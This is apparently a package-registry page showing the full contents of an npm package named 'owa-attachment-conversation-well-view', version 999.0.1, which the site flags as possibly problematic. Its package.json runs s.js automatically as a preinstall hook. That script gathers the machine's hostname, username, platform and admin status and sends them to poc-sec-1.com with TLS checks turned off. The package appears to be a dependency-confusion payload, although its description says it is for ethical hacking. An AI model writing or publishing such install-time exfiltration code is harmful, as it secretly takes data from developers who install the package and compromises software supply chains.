owa-attachment-conversation-well-view 999.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of owa-attachment-conversation-well-view might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +1 -0
- package/s.js +39 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
{"name": "owa-attachment-conversation-well-view", "version": "999.0.1", "description": "Package created for ethical hacking purposes only", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node s.js"}, "author": "", "license": "ISC"}
|
package/s.js
ADDED
@@ -0,0 +1,39 @@
|
|
1
|
+
|
2
|
+
var os = require('os');
|
3
|
+
var hostname = os.hostname();
|
4
|
+
var username = os.userInfo().username;
|
5
|
+
var platform = os.platform();
|
6
|
+
|
7
|
+
var admin_text;
|
8
|
+
|
9
|
+
if (platform == 'win32' || platform == 'win64') {
|
10
|
+
try {{
|
11
|
+
require('child_process').execSync('net session', function(err, stdout, stderr) {
|
12
|
+
if (err || !(stdout.indexOf("There are no entries in the list.") > -1)) {
|
13
|
+
admin_text = 'not admin';
|
14
|
+
} else {
|
15
|
+
admin_text = 'admin';
|
16
|
+
}
|
17
|
+
});
|
18
|
+
}}
|
19
|
+
catch {{
|
20
|
+
admin_text = 'not admin';
|
21
|
+
}}
|
22
|
+
} else {
|
23
|
+
admin_text = os.userInfo().uid;
|
24
|
+
}
|
25
|
+
|
26
|
+
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
|
27
|
+
|
28
|
+
const https = require('http')
|
29
|
+
const options = {
|
30
|
+
hostname: 'poc-sec-1.com',
|
31
|
+
port: 80,
|
32
|
+
path: '/callback/dc.php?Username=' + encodeURI(username + ' (' + admin_text + ')') + '&Hostname=' + encodeURI(hostname) + '&Package=owa-attachment-conversation-well-view',
|
33
|
+
method: 'GET'
|
34
|
+
}
|
35
|
+
|
36
|
+
const req = https.request(options)
|
37
|
+
|
38
|
+
req.end();
|
39
|
+
|